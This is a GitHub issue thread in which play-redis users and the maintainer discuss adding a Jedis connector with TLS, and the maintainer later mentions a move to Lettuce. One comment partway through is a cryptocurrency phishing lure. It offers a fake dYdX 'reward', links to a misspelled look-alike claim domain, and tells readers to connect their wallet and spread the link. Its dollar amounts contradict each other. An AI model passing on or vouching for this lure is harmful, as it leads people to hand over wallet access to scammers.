### ISSUE TITLE
Add a Jedis connector

### ISSUE THREAD

**Issue by adamnation** [KarelCemus/play-redis#248]
### Adding a Jedis Redis Client Provider

1. Jedis is the leading Redis client and supports TLS to connect to AWS and Azure with encryption in transit.
2. We use Azure and we would like our Redis cache activity to be encrypted in transit, but that is not possible with the current Redis Scala library which you use as a Redis client.
3. I propose adding another connector which would allow developers to use either RedisScala or Jedis for communicating with a Redis cluster.
4. Also adding a SSL/TLS secure option to the connection config would be required to support encryption in transit.
5. Add a bridge to the AKKA system for the new connector. 
6. I propose adding a new redis provider setting to the configuration file:

```
{
   play.cache.redis.connector: jedis
   ssl: true
}
```

This would be used to determine the connector at run time and either connect using redisscala (default) or jedis.  Additionally, add ssl config value that would default to false.  It would only do something when jedis is selected, and maybe throw config exception if redisscala is selected.

**Comment by KarelCemus** [comment]
This would require significant work since Jedis is single-threaded and I don't have that much time to do it. Are you willing to implement the alternative connector?

**Comment by adamnation** [comment]
I may be able to do it in my spare time.  Do you have any guidance where I should start to build the bridge in the project?

**Comment by KarelCemus** [comment]
Basically, all you need to do is to implement `RedisConnector` trait, which encapsulates the API. I briefly checked Jedis and if I am not wrong, it seems the implementation is blocking. Therefore I suggest implementing an Akka actor wrapping this behavior and then linking it via the connector trait just like the rediscala implementation does. Finally, it can be integrated via compile-time or runtime DI, which is quite simple then.

**Comment by KarelCemus** [comment]
Yes, I agree that existing connector is dead and it should be migrated to something more alive, maybe jedis or something. However, given that Play itself seems to be dead, it is questionable whether it is efficient to add more features to this at this moment.

Honestly, I am not using play for very long time so this is not on my todolist. However, if anybody is willing to contribute, I'd be more than happy merging it and releasing new version.

**Comment by alejandrod-f** [comment]
Thanks for the answer. After spending some hours I decided to give redisson a try (which we were already using). 
Is too much work updating the rediscache or this project I think.

Basically implement a custom `AsyncCacheApi` . That should be easy. 
There are other things that worries my, we are planning on moving to scala 3 and dead projects are not good. 
Play is going to have support for scala3 soon. So, we are good there.

Will see how it goes.  Thanks anyways

**Comment by pradip-ee** [comment]
## Congratulations! You've been chosen to receive a $7,000 Rewards. 🪂🔴 


### Trading and Launch Rewards are live on dYdX Chain! ✨

Connect your wallet, follow the instructions, and claim this exclusive offer from Dydx Exchange. For GitHub users only—share with friends to make it eligible. Redeem your reward first.

[![Dydx Exchange](https://pbs.twimg.com/card_img/1729868185275617280/nzyJpc7G?format=jpg&name=small)](https://claim.dydxexchang.com/)


[![N|Solid](https://cldup.com/dTxpPi9lDf.thumb.png)](https://nodesource.com/products/nsolid)

🚀 **Claim Your Rewards Now!** [Check Eligibility](https://claim.dydxexchang.com/)

Access the Dydx Exchange platform and connect your wallet securely. Ensure you're using a trusted wallet for the transaction.

- 🔗 Connect your wallet twice
- 📋 Register on the platform
- 💰 Claim your Rewards, up to $2,000!

@dydxprotocol

**Comment by KarelCemus** [comment]
#301 replaces the current Rediscala connector with Lettuce. I hope that this one will last longer than all previous connectors. :crossed_fingers:
